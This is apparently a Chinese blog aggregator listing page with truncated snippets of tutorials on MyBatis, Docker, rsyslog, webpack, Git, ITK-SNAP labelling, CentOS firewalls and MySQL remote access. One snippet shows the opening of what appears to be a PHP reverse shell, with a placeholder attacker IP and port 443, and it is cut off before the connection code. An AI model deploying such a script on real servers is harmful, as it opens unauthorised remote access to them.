准备工作 public class MainClass { public static void main(String[] args) throws Exception { String resources = "mybatis-config.xml"; InputStream inputStre ...
分类:
其他好文 时间:
2021-07-07 17:50:47
阅读次数:
0
1、在volumes下设置 volumes: - consul-config:/consul/config:z - consul-data:/consul/data:z - /etc/localtime:/etc/localtime:ro - /etc/timezone:/etc/timezone: ...
分类:
其他好文 时间:
2021-07-07 17:48:03
阅读次数:
0
1. 日志文件格式包含以下四列: 事件时间 | 发生事件的服务器的主机名 | 产生事件的服务名或程序名 | 事件的具体信息 2. /etc/rsyslog.conf 配置文件 # 服务名称 [连接符号] 日志等级 日志记录位置 authpriv.* /var/log/auth.log # 认证相关服 ...
分类:
系统相关 时间:
2021-07-06 16:25:48
阅读次数:
0
Rsyslog简介 Rsyslog的全称是 rocket-fast system for log,它提供了高性能,高安全功能和模块化设计。rsyslog能够接受从各种各样的来源,将其输入,输出的结果到不同的目的地。rsyslog可以提供超过每秒一百万条消息给目标文件。 日志是任何软件或操作系统的关键 ...
分类:
系统相关 时间:
2021-07-05 19:06:35
阅读次数:
0
官方文档 1、初始化package.json文件 npm init -y 2、创建基本目录结构 3、配置webpack npm i -D webpack 4、创建并配置 webpack.config.js 文件 var path = require('path') module.exports = ...
分类:
Web程序 时间:
2021-07-05 19:01:56
阅读次数:
0
4. Git基本工作流程 Git工作区域 向仓库中添加文件流程 4. Git初始化及仓库创建和操作 基本信息设置 1. 设置用户名 git config --global user.name 'itcastphpgit1' 2. 设置用户名邮箱 git config --global user.em ...
分类:
其他好文 时间:
2021-07-05 19:01:11
阅读次数:
0
<?php error_reporting (E_ERROR); ignore_user_abort(true); ini_set('max_execution_time',0); $ipaddr = 'xxx.xxx.xxx.xxx'; $port = '443'; $msg = php_unam ...
标注工具 标注工具推荐使用ITK-SNAP,windows、linux和MacOS平台都支持。 标注的读取 通过ITK-SNAP加载数据和label文件,我们可以看到用不同颜色区分的标注,如下图: 图中有两个label,分别为Label1和Label2,对应图中红色和绿色部分。 下面我们用程序读取l ...
分类:
其他好文 时间:
2021-07-05 18:51:01
阅读次数:
0
CentOS7防火墙命令有变化: CentOS7: systemctl status firewalld.service 查看防火墙状态 systemctl stop firewalld.service 本次访问关闭防火墙 systemctl disable firewalld.service 从下 ...
分类:
其他好文 时间:
2021-07-05 18:49:21
阅读次数:
0
在购买服务器且安装了Mysql之后,并且安全组和防火墙都开放了端口,但是还是无法连接 原因就是mysql设置的就是只有本机可以连接 解决办法 # 1. 登录服务器,在服务器上登录mysql # 2. 使用user这个库 use user; # 3. 查看root账户 select host,user ...
分类:
数据库 时间:
2021-07-05 18:40:36
阅读次数:
0